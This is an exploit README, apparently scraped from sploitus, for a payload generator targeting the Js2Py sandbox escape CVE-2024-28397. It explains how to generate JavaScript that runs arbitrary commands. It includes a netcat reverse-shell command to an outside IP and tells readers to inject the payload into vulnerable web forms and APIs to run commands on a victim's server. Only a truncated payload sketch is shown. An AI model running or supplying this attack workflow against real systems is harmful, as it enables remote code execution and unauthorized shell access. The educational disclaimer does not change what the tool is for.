Share
## https://sploitus.com/exploit?id=DDFBFAE7-6A50-5CEF-A36C-7A837CF9C9AD
# CVE-2024-28397: Js2Py Sandbox Escape Payload Generator

![Python](https://img.shields.io/badge/Python-3.x-blue.svg)
![License](https://img.shields.io/badge/License-MIT-green.svg)
![CVE](https://img.shields.io/badge/CVE-2024--28397-critical.svg)

A professional payload generator for **CVE-2024-28397**. This tool generates malicious JavaScript code designed to escape the `js2py` sandbox (versions <= 0.74) and execute arbitrary commands on the target system.

## 🚨 Vulnerability Details

- **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- **Affected Component:** `Js2Py` <= 0.74
- **Impact:** Remote Code Execution (RCE) / Sandbox Escape
- **Mechanism:** Exploits `Object.getOwnPropertyNames` to access Python's `subprocess.Popen` class from within the JavaScript environment.

## πŸš€ Usage

This script generates the exact JavaScript payload needed to exploit the vulnerability. You do not need to install `js2py` to use this tool.

### 1. Generate a Payload
Run the script with the command you want to execute on the victim's machine.

```bash
# Generate payload to run 'id'
python3 exploit.py -c "id"
```

```bash
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
```

### 2. Attack the Target
Copy the output generated by the tool and inject it into the vulnerable application (e.g., a web form, API endpoint, or configuration file that is parsed by `js2py`).

**Example Injection:**
If a website takes user input and runs it with `js2py.eval_js(user_input)`, pasting the generated code will execute your command on their server.

## πŸ“ Example

```bash
$ python3 exploit.py -c "whoami"

    var output = "Initial";
    try {
        var leaked_wrapper = Object.getOwnPropertyNames({});
        // ... (full malicious code) ...
        var res = Popen("whoami", ...).communicate();
        output = res;
    } ...
    output
```

## πŸ‘¨β€πŸ’» Author

**Ali SΓΌnbΓΌl (xeloxa)**

- πŸ“§ Email: [alisunbul@proton.me](mailto:alisunbul@proton.me)
- 🌐 Website: [xeloxa.netlify.app](https://xeloxa.netlify.app)
- πŸ™ GitHub: [@xeloxa](https://github.com/xeloxa)

## ⚠️ Disclaimer

This software is provided for **educational and security research purposes only**. The author accepts no responsibility for any misuse of this code. Ensure you have explicit permission before testing this on any system you do not own.